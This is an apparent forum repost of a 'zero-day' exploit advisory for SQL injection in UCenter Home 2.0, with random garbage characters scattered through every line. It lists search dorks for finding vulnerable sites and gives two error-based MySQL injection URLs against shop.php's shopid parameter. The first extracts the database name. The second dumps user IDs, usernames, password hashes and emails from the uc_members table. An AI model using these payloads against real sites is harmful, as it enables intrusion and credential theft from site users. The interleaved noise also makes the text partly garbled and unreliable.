. D) P! M2 B/ {2 j: ^4 Z__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
! i) x+ e: ~: _1 V8 D
7 v2 d c5 {3 b+ m5 m' _
. j( K: w; f: I7 [! M. _: h9 {, v _8 \: J' n) j% u
*/ Author : KnocKout + \9 s5 l( [8 v" B6 U
# \2 e+ n7 j& P; ^7 B; @1 p*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
. ^5 y! g4 Z+ S
0 {+ D K; \" S: S*/ Contact: knockoutr@msn.com 0 t7 E, f2 k3 [- f
$ i. \' g5 D* {, [# X*/ Cyber-Warrior.org/CWKnocKout 8 m; m6 f; X4 S* r0 u) k
9 N* f+ C5 M$ y+ R( v- a
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & w! c9 U! d4 X" A) I% B m/ f" p
0 j/ @% C/ c" o) U6 t, n- S3 \
Script : UCenter Home
1 u( F, |0 @, D. z$ c3 O* l* |
& U0 F+ `$ g- VVersion : 2.0
. G1 s5 z6 ]* f% X5 \. Q
8 y0 I% ^1 |; W j% n- Z8 S1 p8 G6 pScript HomePage : http://u.discuz.net/
+ Y# P4 M1 s( O: \2 N" J- X
( B# t6 Q }6 f- l5 B& ^1 t__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ X/ h: C) S. X. o m9 K
, z# q0 i& @. K/ ZDork : Powered by UCenter inurl:shop.php?ac=view
2 V1 q0 ]; \. r2 {; R& O$ D. X- m
& E$ F5 B4 W# N# J" e( m3 o! N+ G4 gDork 2 : inurl:shop.php?ac=view&shopid=
& B v' I \: q; c2 ^8 A1 E! _$ I4 S$ A/ z$ _9 s
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # b7 A. D/ E/ O7 v
4 M7 a9 f- q% b- r6 r R/ o
Vuln file : Shop.php , X( N0 M+ O7 A% {
: s/ x& }" D6 T
value's : (?)ac=view&shopid=
' h$ D T+ K% i/ ~$ |1 }& ]- Z" }$ J# X& Z% K
Vulnerable Style : SQL Injection (MySQL Error Based)
4 m0 ?4 v- }6 r5 j% ?1 X: P: D
- c$ `9 {) e+ t/ r9 q( Y/ dNeed Metarials : Hex Conversion v( k+ t8 W$ T+ X3 x
: i K# h" f Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; V& o" l. |; M( v3 a. ?0 M; f
5 E% G+ C4 B3 P3 G/ z# _ M) NYour Need victim Database name.
# O0 s" J7 J/ x# K8 v1 L
9 J4 b! n! ~, i3 g5 A7 }- ^for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 6 ~( k; W' o9 r
1 f9 k' F) h9 e- [# @* G..
8 M4 A1 j% J3 g q1 p% j2 V& Q8 D& ^. y% }5 q, W
DB : Okey. L9 z) `5 S5 A) ?# ~9 I+ }' n
- c- V- x* M; W Hyour edit DB `[TARGET DB NAME]`
/ {5 ]5 `+ r, ~% d5 n" A6 T* S
( I. x$ N8 h: L% Y" b o- x) ?8 D" `Example : 'hiwir1_ucenter'
$ g, w- [4 V, a5 n% m0 R; t Z6 T
Edit : Okey. 7 Y) b# x6 F8 I
9 i$ Y% n& U: ~2 X2 U- j- }' NYour use Hex conversion. And edit Your SQL Injection Exploit..
" Z9 ]7 |2 P4 l: J O0 n
5 V! x) e/ P5 v$ G! J; y+ B
$ ^' j. x+ L! H! a# F9 P2 {# h" {5 U$ q+ i% y) ]% ?
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
. n6 s# I1 h q! F% f |
发表于 2013-2-27 21:31:31
收藏
支持
反对